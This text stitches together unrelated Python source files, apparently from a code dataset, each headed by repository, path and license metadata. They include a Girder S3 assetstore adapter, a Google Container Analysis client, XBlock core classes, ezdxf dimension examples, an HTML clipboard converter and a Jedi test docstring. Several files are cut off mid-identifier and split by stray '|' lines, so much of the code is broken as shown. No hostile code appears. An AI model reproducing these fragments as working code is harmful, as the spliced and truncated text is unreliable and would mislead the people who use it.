doc['prefix'] = ''
# remove slashes from front and back of the prefix
doc['prefix'] = doc['prefix'].strip('/')
if not doc.get('bucket'):
raise ValidationException('Bucket must not be empty.', 'bucket')
if not doc.get('readOnly'):
if not doc.get('secret'):
raise ValidationException(
'Secret key must not be empty.', 'secret')
if not doc.get('accessKeyId'):
raise ValidationException(
'Access key ID must not be empty.', 'accessKeyId')
# construct a set of connection parameters based on the keys and the
# service
if 'service' not in doc:
doc['service'] = ''
if doc['service'] != '':
service = re.match("^((https?)://)?([^:/]+)(:([0-9]+))?$",
doc['service'])
if not service:
raise ValidationException(
'The service must of the form [http[s]://](host domain)'
'[:(port)].', 'service')
doc['botoConnect'] = makeBotoConnectParams(
doc['accessKeyId'], doc['secret
|
'], doc['service'])
# Make sure we can write into the given bucket using boto
conn = botoConnectS3(doc['botoConnect'])
if doc.get('readOnly'):
try:
conn.get_bucket(bucket_name=doc['bucket'], validate=True)
except Exception:
logger.exception('S3 assetstore validation exception')
raise ValidationException('Unable to connect to bucket "%s".' %
|
doc['bucket'], 'bucket')
else:
try:
bucket = conn.get_bucket(bucket_name=doc['bucket'],
validate=True)
testKey = boto.s3.key.Key(
bucket=bucket, name='/'.join(
filter(None, (doc['prefix'], 'test'))))
testKey.set_contents_from_string('')
except Exception:
logger.exception('S3 assetstore validation exception')
raise ValidationException('Unable to write into bucket "%s".' %
doc['bucket'], 'bucket')
return doc
def __init__(self, assetstore):
"""
:param assetstore: The assetstore to act on.
"""
super(S3AssetstoreAdapter, self).__init__(assetstore)
if ('accessKeyId' in self.assetstore and 'secret' in self.assetstore and
'service' in self.assetstore):
self.assetstore['botoConnect'] = makeBotoConnectParams(
self.assetstore['accessKeyId'], self.assetstore['secret'],
self.assetstore['service'])
def _getRequestHeaders(self, upload):
return {
'Content-Disposition': 'attachment; filename="%s"' % upload['name'],
'Content-Type': upload.get('mimeType', ''),
'x-amz-acl': 'private',
'x-amz-meta-uploader-id': str(upload['userId']),
'x-amz-meta-uploader-ip': str(cherrypy.request.remote.ip)
}
def initUpload(self, upload):
"""
Build the request required to initiate an authorized upload to S3.
"""
if upload['size'] <= 0:
return upload
uid = uuid.uuid4().hex
key = '/'.join(filter(None, (self.assetstore.get('prefix', ''),
uid[0:2], uid[2:4], uid)))
path = '/%s/%s' % (self.assetstore['bucket'], key)
headers = self._getRequestHeaders(upload)
chunked = upload['size'] > self.CHUNK_LEN
upload['behavior'] = 's3'
upload['s3'] = {
'chunked': chunked,
'chunkLength': self.CHUNK_LEN,
'relpath': path,
'key': key
}
if chunked:
upload['s3']['request'] = {'method': 'POST'}
alsoSignHeaders = {}
queryParams = {'uploads': None}
else:
upload['s3']['request'] = {'method': 'PUT'}
alsoSignHeaders = {
'Content-Length': upload['size']
}
|
tseaver/google-cloud-python
|
containeranalysis/google/cloud/devtools/containeranalysis_v1/gapic/container_analysis_client.py
|
Python
|
apache-2.0
| 21,328
| 0.001688
|
# -*- coding: utf-8 -*-
#
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Accesses the google.devtools.containeranalysis.v1 ContainerAnalysis API."""
import pkg_resources
import warnings
from google.oauth2 import service_account
import google.api_core.client_options
import google.api_core.gapic_v1.client_info
import google.api_core.gapic_v1.config
import google.api_core.gapic_v1.method
import google.api_core.gapic_v1.routing_header
import google.api_core.grpc_helpers
import google.api_core.path_template
import grpc
from google.cloud.devtools.containeranalysis_v1.gapic import (
container_analysis_client_config,
)
from google.cloud.devtools.containeranalysis_v1.gapic.transports import (
|
container_analysis_grpc_transport,
)
from google.cloud.devtools.containeranalysis_v1.proto import containeranalysis_pb2_grpc
from google.iam.v1
|
import iam_policy_pb2
from google.iam.v1 import options_pb2
from google.iam.v1 import policy_pb2
from grafeas import grafeas_v1
from grafeas.grafeas_v1.gapic.transports import grafeas_grpc_transport
_GAPIC_LIBRARY_VERSION = pkg_resources.get_distribution(
"google-cloud-containeranalysis"
).version
class ContainerAnalysisClient(object):
"""
Retrieves analysis results of Cloud components such as Docker container
images. The Container Analysis API is an implementation of the
`Grafeas <https://grafeas.io>`__ API.
Analysis results are stored as a series of occurrences. An
``Occurrence`` contains information about a specific analysis instance
on a resource. An occurrence refers to a ``Note``. A note contains
details describing the analysis and is generally stored in a separate
project, called a ``Provider``. Multiple occurrences can refer to the
same note.
For example, an SSL vulnerability could affect multiple images. In this
case, there would be one note for the vulnerability and an occurrence
for each image with the vulnerability referring to that note.
"""
SERVICE_ADDRESS = "containeranalysis.googleapis.com:443"
"""The default address of the service."""
# The name of the interface for this client. This is the key used to
# find the method configuration in the client_config dictionary.
_INTERFACE_NAME = "google.devtools.containeranalysis.v1.ContainerAnalysis"
@classmethod
def from_service_account_file(cls, filename, *args, **kwargs):
"""Creates an instance of this client using the provided credentials
file.
Args:
filename (str): The path to the service account private key json
file.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
ContainerAnalysisClient: The constructed client.
"""
credentials = service_account.Credentials.from_service_account_file(filename)
kwargs["credentials"] = credentials
return cls(*args, **kwargs)
from_service_account_json = from_service_account_file
@classmethod
def note_path(cls, project, note):
"""Return a fully-qualified note string."""
return google.api_core.path_template.expand(
"projects/{project}/notes/{note}", project=project, note=note
)
@classmethod
def occurrence_path(cls, project, occurrence):
"""Return a fully-qualified occurrence string."""
return google.api_core.path_template.expand(
"projects/{project}/occurrences/{occurrence}",
project=project,
occurrence=occurrence,
)
def __init__(
self,
transport=None,
channel=None,
credentials=None,
client_config=None,
client_info=None,
client_options=None,
):
"""Constructor.
Args:
transport (Union[~.ContainerAnalysisGrpcTransport,
Callable[[~.Credentials, type], ~.ContainerAnalysisGrpcTransport]): A transport
instance, responsible for actually making the API calls.
The default transport uses the gRPC protocol.
This argument may also be a callable which returns a
transport instance. Callables will be sent the credentials
as the first argument and the default transport class as
the second argument.
channel (grpc.Channel): DEPRECATED. A ``Channel`` instance
through which to make calls. This argument is mutually exclusive
with ``credentials``; providing both will raise an exception.
credentials (google.auth.credentials.Credentials): The
authorization credentials to attach to requests. These
credentials identify this application to the service. If none
are specified, the client will attempt to ascertain the
credentials from the environment.
This argument is mutually exclusive with providing a
transport instance to ``transport``; doing so will raise
an exception.
client_config (dict): DEPRECATED. A dictionary of call options for
each method. If not specified, the default configuration is used.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
client_options (Union[dict, google.api_core.client_options.ClientOptions]):
Client options used to set user options on the client. API Endpoint
should be set through client_options.
"""
# Raise deprecation warnings for things we want to go away.
if client_config is not None:
warnings.warn(
"The `client_config` argument is deprecated.",
PendingDeprecationWarning,
stacklevel=2,
)
else:
client_config = container_analysis_client_config.config
if channel:
warnings.warn(
"The `channel` argument is deprecated; use " "`transport` instead.",
PendingDeprecationWarning,
stacklevel=2,
)
api_endpoint = self.SERVICE_ADDRESS
if client_options:
if type(client_options) == dict:
client_options = google.api_core.client_options.from_dict(
client_options
)
if client_options.api_endpoint:
api_endpoint = client_options.api_endpoint
# Instantiate the transport.
# The transport is responsible for handling serialization and
# deserialization and actually sending data to the service.
if transport:
if callable(transport):
self.transport = transport(
credentials=credentials,
default_class=container_analysis_grpc_transport.ContainerAnalysisGrpcTransport,
address=api_endpoint,
)
else:
if credentials:
raise ValueError(
"Received both a transport instance and "
"credentials; these are mutually exclusive."
)
self.transport = transport
else:
self.transport = container_analysis
|
nagyistoce/edx-XBlock
|
xblock/core.py
|
Python
|
apache-2.0
| 9,923
| 0.002721
|
"""
Core classes for the XBlock family.
This
|
code is in the Runtime layer, because it is authored once by edX
and used by all runtimes.
"""
import inspect
import pkg_resources
import warnings
from collections import defaultdict
from xblock.exceptions import DisallowedFileError
from xblock.fields import String, List, Scop
|
e
from xblock.internal import class_lazy
import xblock.mixins
from xblock.mixins import (
ScopedStorageMixin,
HierarchyMixin,
RuntimeServicesMixin,
HandlersMixin,
XmlSerializationMixin,
IndexInfoMixin,
ViewsMixin,
)
from xblock.plugin import Plugin
from xblock.validation import Validation
# exposing XML_NAMESPACES as a member of core, in order to avoid importing mixins where
# XML_NAMESPACES are needed (e.g. runtime.py).
XML_NAMESPACES = xblock.mixins.XML_NAMESPACES
# __all__ controls what classes end up in the docs.
__all__ = ['XBlock']
UNSET = object()
class XBlockMixin(ScopedStorageMixin):
"""
Base class for XBlock Mixin classes.
XBlockMixin classes can add new fields and new properties to all XBlocks
created by a particular runtime.
"""
pass
class SharedBlockBase(Plugin):
"""
Behaviors and attrs which all XBlock like things should share
"""
@classmethod
def open_local_resource(cls, uri):
"""Open a local resource.
The container calls this method when it receives a request for a
resource on a URL which was generated by Runtime.local_resource_url().
It will pass the URI from the original call to local_resource_url()
back to this method. The XBlock must parse this URI and return an open
file-like object for the resource.
For security reasons, the default implementation will return only a
very restricted set of file types, which must be located in a folder
called "public". XBlock authors who want to override this behavior will
need to take care to ensure that the method only serves legitimate
public resources. At the least, the URI should be matched against a
whitelist regex to ensure that you do not serve an unauthorized
resource.
"""
# Verify the URI is in whitelisted form before opening for serving.
# URI must begin with public/, and no file path component can start
# with a dot, which prevents ".." and ".hidden" files.
if not uri.startswith("public/"):
raise DisallowedFileError("Only files from public/ are allowed: %r" % uri)
if "/." in uri:
raise DisallowedFileError("Only safe file names are allowed: %r" % uri)
return pkg_resources.resource_stream(cls.__module__, uri)
# -- Base Block
class XBlock(XmlSerializationMixin, HierarchyMixin, ScopedStorageMixin, RuntimeServicesMixin, HandlersMixin,
IndexInfoMixin, ViewsMixin, SharedBlockBase):
"""Base class for XBlocks.
Derive from this class to create a new kind of XBlock. There are no
required methods, but you will probably need at least one view.
Don't provide the ``__init__`` method when deriving from this class.
"""
entry_point = 'xblock.v1'
name = String(help="Short name for the block", scope=Scope.settings)
tags = List(help="Tags for this block", scope=Scope.settings)
@class_lazy
def _class_tags(cls): # pylint: disable=no-self-argument
"""
Collect the tags from all base classes.
"""
class_tags = set()
for base in cls.mro()[1:]: # pylint: disable=no-member
class_tags.update(getattr(base, '_class_tags', set()))
return class_tags
@staticmethod
def tag(tags):
"""Returns a function that adds the words in `tags` as class tags to this class."""
def dec(cls):
"""Add the words in `tags` as class tags to this class."""
# Add in this class's tags
cls._class_tags.update(tags.replace(",", " ").split()) # pylint: disable=protected-access
return cls
return dec
@classmethod
def load_tagged_classes(cls, tag, fail_silently=True):
"""
Produce a sequence of all XBlock classes tagged with `tag`.
fail_silently causes the code to simply log warnings if a
plugin cannot import. The goal is to be able to use part of
libraries from an XBlock (and thus have it installed), even if
the overall XBlock cannot be used (e.g. depends on Django in a
non-Django application). There is diagreement about whether
this is a good idea, or whether we should see failures early
(e.g. on startup or first page load), and in what
contexts. Hence, the flag.
"""
# Allow this method to access the `_class_tags`
# pylint: disable=W0212
for name, class_ in cls.load_classes(fail_silently):
if tag in class_._class_tags:
yield name, class_
def __init__(self, runtime, field_data=None, scope_ids=UNSET, *args, **kwargs):
"""
Construct a new XBlock.
This class should only be instantiated by runtimes.
Arguments:
runtime (:class:`.Runtime`): Use it to access the environment.
It is available in XBlock code as ``self.runtime``.
field_data (:class:`.FieldData`): Interface used by the XBlock
fields to access their data from wherever it is persisted.
Deprecated.
scope_ids (:class:`.ScopeIds`): Identifiers needed to resolve
scopes.
"""
if scope_ids is UNSET:
raise TypeError('scope_ids are required')
# Provide backwards compatibility for external access through _field_data
super(XBlock, self).__init__(runtime=runtime, scope_ids=scope_ids, field_data=field_data, *args, **kwargs)
def render(self, view, context=None):
"""Render `view` with this block's runtime and the supplied `context`"""
return self.runtime.render(self, view, context)
def validate(self):
"""
Ask this xblock to validate itself. Subclasses are expected to override this
method, as there is currently only a no-op implementation. Any overriding method
should call super to collect validation results from its superclasses, and then
add any additional results as necessary.
"""
return Validation(self.scope_ids.usage_id)
class XBlockAside(XmlSerializationMixin, ScopedStorageMixin, RuntimeServicesMixin, HandlersMixin, SharedBlockBase):
"""
This mixin allows Xblock-like class to declare that it provides aside functionality.
"""
entry_point = "xblock_asides.v1"
@classmethod
def aside_for(cls, view_name):
"""
A decorator to indicate a function is the aside view for the given view_name.
Aside views should have a signature like:
@XBlockAside.aside_for('student_view')
def student_aside(self, block, context=None):
...
return Fragment(...)
"""
# pylint: disable=protected-access
def _decorator(func): # pylint: disable=missing-docstring
if not hasattr(func, '_aside_for'):
func._aside_for = []
func._aside_for.append(view_name) # pylint: disable=protected-access
return func
return _decorator
@class_lazy
def _combined_asides(cls): # pylint: disable=no-self-argument
"""
A dictionary mapping XBlock view names to the aside method that
decorates them (or None, if there is no decorator for the specified view).
"""
# The method declares what views it decorates. We rely on `dir`
# to handle subclasses and overrides.
combined_asides = defaultdict(None)
for _view_name, view_func in inspect.getmembers(cls, lambda attr: hasattr(attr, '_aside_for')):
aside_for = getattr(view_func, '_aside_for', [])
for view in aside_for:
combined_asides[view] = view_func.__name__
return combined_asides
def aside_vie
|
razzius/PyClassLessons
|
instructors/course-2015/errors_and_introspection/project/primetester3.py
|
Python
|
mit
| 969
| 0.004128
|
"""
For any given number, we only need to test the primes below it.
e.g. 9 -- we need only test 1,2,3,5,7
e.g. 8 -- we need only test 1,2,3,5,7
for example, the number 12 has factors 1,2,3,6,12.
We could find the six factor but we will find the two factor first.
The definition of a composite number is that it is composed of primes, therefor
|
e it will always have a prime as a factor.
This prime test should have an index of all primes below i.
"""
total_range = 100000
|
0
primes = list()
def prime_test(i):
"""
Cases:
Return False if i is not prime
Return True if i is prime
Caveat: cannot test 1.
Caveat 2: Cannot test 2.
It is fortuitous that these tests both return true.
"""
for possible_factor in primes:
if i % possible_factor == 0:
return False
return True
for prime in range(2,total_range):
is_prime = prime_test(prime)
if is_prime:
primes.append(prime)
print len(primes)
|
ProfessorX/Config
|
.PyCharm30/system/python_stubs/-1247972723/gio/_gio/FileMonitorEvent.py
|
Python
|
gpl-2.0
| 785
| 0.007643
|
# encoding: utf-8
# module gio._gio
# from /usr/lib/python2.7/dist-packages/gtk-2.0/gio/_gio.so
# by generator 1.135
# no doc
# imports
import gio as __
|
gio
import glib as __glib
import gobject as __gobject
import gobject._gobject as __gobject__gobject
class FileMonitorEvent(__gobject.GEnum):
# no doc
def __init__(self, *args, **kwargs): # real signature unknown
pass
__weakref__ = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""list of weak references to the object (if defined)"""
__dict__ = None # (!) real value is ''
|
__enum_values__ = {
0: 0,
1: 1,
2: 2,
3: 3,
4: 4,
5: 5,
6: 6,
7: 7,
}
__gtype__ = None # (!) real value is ''
|
mozman/ezdxf
|
examples/render/dimension_linear.py
|
Python
|
mit
| 24,851
| 0.000563
|
# Purpose: using DIMENSION horizontal, vertical and rotated
# Copyright (c) 2018-2021, Manfred Moitzi
# License: MIT License
from typing import cast
import math
import pathlib
import random
import logging
import ezdxf
from ezdxf.tools.standards import setup_dimstyle
from ezdxf.math import Vec3, UCS
from ezdxf.entities import DimStyle
from ezdxf.enums import MTextLineAlignment
# ========================================
# Setup logging
# ========================================
logging.basicConfig(level="WARNING")
# ========================================
# Setup your preferred output directory
# ========================================
OUTDIR = pathlib.Path("~/Desktop/Outbox").expanduser()
if not OUTDIR.exists():
OUTDIR = pathlib.Path()
# ========================================
# Default text attributes
# ========================================
TEXT_ATTRIBS = {
"height": 0.25,
"style": ezdxf.options.default_dimension_text_style,
}
DIM_TEXT_STYLE = ezdxf.options.default_dimension_text_style
# =======================================================
# Discarding dimension rendering is possible
# for BricsCAD, but is incompatible to AutoCAD -> error
# =======================================================
BRICSCAD = False
def set_text_style(doc, textstyle=DIM_TEXT_STYLE, name="EZDXF"):
if doc.dxfversion == "AC1009":
return
dimstyle = cast(DimStyle, doc.dimstyles.get(name))
dimstyle.dxf.dimtxsty = textstyle
def linear_tutorial(dxfversion="R12"):
doc = ezdxf.new(dxfversion, setup=True)
msp = doc.modelspace()
msp.add_line((0, 0), (3, 0))
msp.add_line((0, 7), (10, 0))
# horizontal DIMENSION
# Default DimStyle EZDXF:
# 1 drawing unit == 1m;
# scale 1: 100;
# length_factor=100 -> measurement in cm
#
# base: defines the dimension line, ezdxf accepts any point on the
# dimension line
# p1: defines the start point of the first extension line, which also
# defines the first point to measure
# p2: defines the start point of the second extension line, which also
# defines the second point to measure
dim = msp.add_linear_dim(
base=(3, 2),
p1=(0, 0),
p2=(3, 0),
dimstyle="EZDXF",
override={"dimtxsty": "OpenSans"},
)
# Necessary second step, to create the BLOCK entity with the DIMENSION
# geometry.
# Ezdxf supports DXF R2000 attributes for DXF R12 rendering, but they have
# to be applied by the DIMSTYLE override feature, this additional attributes
# are not stored in the XDATA section of the DIMENSION entity, they are just
# used to render the DIMENSION entity.
# The return value `dim` is not a DIMENSION entity, instead a
# DimStyleOverride object is returned, the DIMENSION entity is stored as
# dim.dimension, see also ezdxf.override.DimStyleOverride class.
dim.render()
# rotated DIMENSION without `override` uses ezdxf.options.default_dimension_text_style
# (OpenSansCondensed-Light)
# angle: defines the angle of the dimension line in relation to the x-axis
# of the WCS or UCS, measurement is the
# distance between first and second measurement point in direction of `angle`
dim2 = msp.add_linear_dim(
base=(10, 2),
p1=(7, 0),
p2=(10, 0),
angle=-30,
dimstyle="EZDXF",
override={
"dimdle": 0,
"dimdec": 2,
"dimtfill": 2, # custom text fill
"dimtfillclr": 4, # cyan
},
)
# Some properties have setter methods for convenience, this is also the
# reason for not calling dim2.render() automatically.
dim2.set_arrows(blk=ezdxf.ARROWS.closed_filled, size=0.25)
dim2.set_text_align(halign="right")
dim2.render()
doc.set_modelspace_vport(height=5, center=(5, 0))
doc.saveas(OUTDIR / f"dim_linear_{dxfversion}_tutorial.dxf")
def example_background_fill(dxfversion="R12"):
"""This example shows the background fill feature, ezdxf uses MTEXT for this
feature and has no effect in DXF R12.
"""
doc = ezdxf.new(dxfversion, setup=True)
msp = doc.modelspace()
msp.add_line((0, 2.2), (10, 2.2))
dim = msp.add_linear_dim(
base=(0, 2),
p1=(0, 0),
p2=(3, 0),
dimstyle="EZDXF",
override={
"dimtfill": 1, # background color
},
)
dim.set_text("bgcolor")
dim.render()
dim = msp.add_linear_dim(
base=(0, 2),
p1=(5, 0),
p2=(8, 0),
dimstyle="EZDXF",
override={
"dimtfill": 2, # custom text fill
"dimtfillclr": 4, # cyan
},
)
dim.set_text("cyan")
dim.render()
doc.saveas(OUTDIR / f"background_fill_example_{dxfversion}.dxf")
def example_for_all_text_placings_R12():
doc = ezdxf.new("R12", setup=True)
example_for_all_text_placings(doc, "dim_linear_text_placing_R12.dxf")
def example_for_all_text_placings_ucs_R12():
ucs = UCS(origin=(10, 10, 0), ux=(3, 1, 0), uz=(0, 0, 1))
doc = ezdxf.new("R12", setup=True)
example_for_all_text_placings(
doc, "dim_linear_text_placing_ucs_R12.dxf", ucs
)
def example_for_all_text_placings_in_space_R12():
ucs = UCS(ux=(1, 1, 0), uy=(0, 0, 1))
doc = ezdxf.new("R12", setup=True)
example_for_all_text_placings(
doc, "dim_linear_text_placing_in_space_R12.dxf", ucs
)
def example_for_all_text_placings_R2007():
doc = ezdxf.new("R2007", setup=True)
set_text_style(doc)
example_for_all_text_placings(doc, "dim_linear_text_placing_R2007.dxf")
def example_for_all_text_placings_ucs_R2007():
ucs = UCS(origin=(10, 10, 0), ux=(3, 1, 0), uz=(0, 0, 1))
doc = ezdxf.new("R2007", setup=True)
set_text_style(doc)
example_for_all_text_placings(
doc, "dim_linear_text_placing_ucs_R2007.dxf", ucs
)
def example_for_all_text_placings_in_space_R2007():
ucs = (
UCS(origin=(20, 20, 0))
.rotate_local_x(math.radians(45))
.rotate_local_z(math.radians(45))
)
doc = ezdxf.new("R2007", setup=True)
set_text_style(doc)
example_for_all_text_placings(
doc, "dim_linear_text_placing_in_space_R2007.dxf", ucs
)
def example_for_all_text_placings(doc, filename, ucs=None):
"""This example shows many combinations of dimension text placing by
`halign`, `valign` and user defined location override.
Args:
doc: DXF drawing
filename: file name for saving
ucs: user defined coordinate system
"""
def add_text(lines, insert):
insert += (0.2, 0)
attribs = dict(TEXT_ATTRIBS)
line_space = 0.4
delta = Vec3(0, line_space, 0)
for line in lines:
text = msp.add_text(line, dxfattribs=attribs).set_pos(insert)
if ucs:
text.transform(ucs.matrix)
insert -= delta
msp = doc.modelspace()
setup_dimstyle(
doc,
name="TICK",
fmt="EZ_M_100_H25_CM",
style=DIM_TEXT_STYLE,
)
setup_dimstyle(
doc,
name="ARCHTICK",
fmt="EZ_M_100_H25_CM",
blk=ezdxf.ARROWS.architectural_tick,
style=DIM_TEXT_STYLE,
)
setup_dimstyle(
doc,
name="CLOSEDBLANK",
fmt="EZ_M_100_H25_CM",
blk=ezdxf.ARROWS.closed_blank,
style=DIM_TEXT_STYLE,
)
def text(dimstyle, x, y, halign, valign, oblique=0):
"""Default dimension text placing
Args:
dimstyle: dimstyl
|
e to use
x: start point x
y: start point y
halign: horizontal text alignment
|
- "left", "right", "center",
"above1", "above2", requires DXF R2000+
valign: vertical text alignment "above", "center", "below"
oblique: angle of oblique extension line, 0 = orthogonal to
dimension line
"""
dimattr = {}
if oblique:
dimattr["oblique_angle"] = oblique
base = (x, y + 2)
# wide
dim = msp.add_linear_dim(
base=base,
p1=(x, y),
p2=(x + 5, y),
|
sandrafig/addons
|
stock_picking_reports/models/stock_picking.py
|
Python
|
agpl-3.0
| 179
| 0.005587
|
# -*- coding:
|
utf-8 -*-
from openerp import models, fields, api
class StockPicking(models.Model):
_inherit = 'stock.picking'
deliver = f
|
ields.Char(string="Deliver at")
|
rluch/InfoMine
|
infomine/comment.py
|
Python
|
mit
| 1,716
| 0
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
""" Module containing methods for comment preprocessing (cleaning) """
class Comment(object):
"""
Comment Entity.
Besides getters and setters it handlers simple preprocessing methods
"""
def __init__(self, comment_string):
self._comment = comment_string
self._author = None
self._gender = None
self._male_likes = 0
self._female_likes = 0
@property
def comment(self):
return self._comment
@comment.setter
def comment(self, value):
self._
|
comment = value
@property
def author(self):
r
|
eturn self._author
@author.setter
def author(self, value):
self._author = value
@property
def gender(self):
return self._gender
@gender.setter
def gender(self, value):
self._gender = value
@property
def male_likes(self):
return self._male_likes
@male_likes.setter
def male_likes(self, value):
self._male_likes = value
@property
def female_likes(self):
return self._female_likes
@female_likes.setter
def female_likes(self, value):
self._female_likes = value
@property
def likes(self):
""" Returns the calculated sum of male and female likes """
return self._male_likes + self._female_likes
@property
def likes_ratio(self):
""" Returns the male ratio """
if self.likes > 0:
return float(self.male_likes) / float(self.likes)
else:
return 0.0
def __str__(self):
return '%s' % self._comment
def lower_comment(self):
self._comment = self._comment.lower()
|
berkus/enso
|
enso/platform/win32/selection/HtmlClipboardFormat.py
|
Python
|
bsd-3-clause
| 9,263
| 0.014574
|
# Copyright (c) 2008, Humanized, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of Enso nor the names of its contributors may
# be used to endorse or promote products derived from this
# software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY Humanized, Inc. ``AS IS'' AND ANY
# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL Humanized, Inc. BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
The Win32 clipboard uses
|
a special format for handling HTML. The basic
problem that the special format is trying to solve is that the user can
select an arbitrary chunk of formatted text that m
|
ight not be valid HTML.
For instance selecting half-way through a bolded word would contain no </b>
tag. The solution is to encase the fragment in a valid HTML document.
You can read more about this at:
http://msdn.microsoft.com/workshop/networking/clipboard/htmlclipboard.asp
This module deals with converting between the clipboard HTML format and
standard HTML format.
"""
# ----------------------------------------------------------------------------
# Imports
# ----------------------------------------------------------------------------
import re
# ----------------------------------------------------------------------------
# Private Functions
# ----------------------------------------------------------------------------
def _findFirst( pattern, src ):
"""
A helper function that simplifies the logic of using regex to find
the first match in a string.
"""
results = re.findall( pattern, src )
if len(results) > 0:
return results[0]
return None
# ----------------------------------------------------------------------------
# HtmlClipboardFormat Object
# ----------------------------------------------------------------------------
class HtmlClipboardFormat:
"""
Encapsulates the conversation between the clipboard HTML
format and standard HTML format.
"""
# The 1.0 HTML clipboard header format.
HEADER_FORMAT = \
"Version:1.0\r\n" \
"StartHTML:%(htmlStart)09d\r\n" \
"EndHTML:%(htmlEnd)09d\r\n" \
"StartFragment:%(fragmentStart)09d\r\n" \
"EndFragment:%(fragmentEnd)09d\r\n" \
"StartSelection:%(fragmentStart)09d\r\n" \
"EndSelection:%(fragmentEnd)09d\r\n" \
"SourceURL:Enso\r\n"
# A generic HTML page.
HTML_PAGE = \
"<!DOCTYPE html PUBLIC \"-//W3C//DTD HTML 3.2//EN\">\n" \
"<html>\n<head><title></title></head>\n" \
"<body>%s</body>\n" \
"</html>"
# These regexps find the character offsets of the fragment strings (see
# below) from the HTML clipboard format header.
START_RE = "StartFragment:(\d+)"
END_RE = "EndFragment:(\d+)"
# The Clipboard HTML format uses the following comment strings to mark
# the beginning and end of the text fragment which represents the user's
# actual selection; everything else is envelope.
START_FRAG = "<!-- StartFragment -->"
END_FRAG = "<!-- EndFragment -->"
def __init__( self, html ):
"""
Initializes the class to represent html.
"""
# Preconditions:
assert( type( html ) == unicode )
# The internal storage format is platonic unicode.
self.html = html
@classmethod
def fromClipboardHtml( cls, clipboardHtml ):
"""
Instantiates the class given a string containing the Win32 Html
Clipboard format. The given clipboardHtml is expected to be in
utf-8 and is expected to contain the special start-fragment and
end-fragment markers as defined in the class constants. If it's
not utf-8 or if it doesn't have the right delimiters, this function
logs a warning message and creates an instance empty of text.
"""
# Preconditions:
assert( type( clipboardHtml ) == str )
try:
html = clipboardHtml.decode( "utf-8" )
except UnicodeDecodeError:
# input can't be decoded from utf-8:
logging.warn( "Non-Utf-8 string in fromClipboardHtml." )
return cls( u"" )
start = _findFirst( cls.START_RE, clipboardHtml )
end = _findFirst( cls.END_RE, clipboardHtml )
if start and end:
html = clipboardHtml[ int(start): int(end) ]
html = html.decode( "utf-8" )
return cls( html )
else:
# Start and end not found in input:
logging.warn( "Missing delimiters in fromClipboardHtml." )
return cls( u"" )
@classmethod
def fromHtml( cls, html ):
"""
Instantiates the class given a string containing plain Html.
"""
# Preconditions:
assert( isinstance( html, unicode ) )
return cls( html )
def toClipboardHtml( self ):
"""
Returns the contents in the Win32 Html format.
"""
return self._encodeHtmlFragment( self.html )
def toHtml( self ):
"""
Returns the contents in the plain Html format.
"""
return self.html
def _createHtmlPage( self, fragment ):
"""
Takes an Html fragment and encloses it in a full Html page.
"""
return self.HTML_PAGE % fragment
def _encodeHtmlFragment(self, sourceHtml):
"""
Join all our bits of information into a string formatted as per the
clipboard HTML format spec.
The return value of this function is a Python string
encoded in UTF-8.
"""
# Preconditions:
assert( type( sourceHtml ) == unicode )
# LONGTERM TODO: The above contract statement involving
# .encode().decode() could have damaging performance
# repercussions.
# NOTE: Every time we construct a string, we must encode it to
# UTF-8 *before* we do any position-sensitive operations on
# it, such as taking its length or finding a substring
# position.
if "<body>" in sourceHtml:
htmlheader, fragment = sourceHtml.split( "<body>" )
fragment, footer = fragment.split( "</body>" )
htmlheader = htmlheader + "<body>"
footer = "</body>" + footer
fragment = "".join( [self.START_FRAG,
fragment,
self.END_FRAG] )
html = "".join([ htmlheader, fragment, footer ])
else:
fragment = sourceHtml
html = self._createHtmlPage( fragment )
fragment = fragment.encode( "utf-8" )
html = html.encode( "utf-8" )
assert html == html.decode( "utf-8" ).encode( "utf-8" ), \
"Encoding got out of whack in HtmlClipboardFo
|
rfguri/vimfiles
|
bundle/ycm/third_party/ycmd/third_party/JediHTTP/vendor/jedi/test/run.py
|
Python
|
mit
| 14,446
| 0.000692
|
#!/usr/bin/env python
"""
|jedi| is mostly being tested by what I would call "Blackbox Tests". These
tests are just testing the interface and do input/output testing. This makes a
lot of sense for |jedi|. Jedi supports so many different code structures, that
it is just stupid to write 200'000 unittests in the manner of
``regression.py``. Also, it is impossible to do doctests/unittests on most of
the internal data structures. That's why |jedi| uses mostly these kind of
tests.
There are different kind of tests:
- completions / goto_definitions ``#?``
- goto_assignments: ``#!``
- usages: ``#<``
How to run tests?
+++++++++++++++++
Jedi uses pytest_ to run unit and integration tests. To run tests,
simply run ``py.test``. You can also use tox_ to run tests for
multiple Python versions.
.. _pytest: http://pytest.org
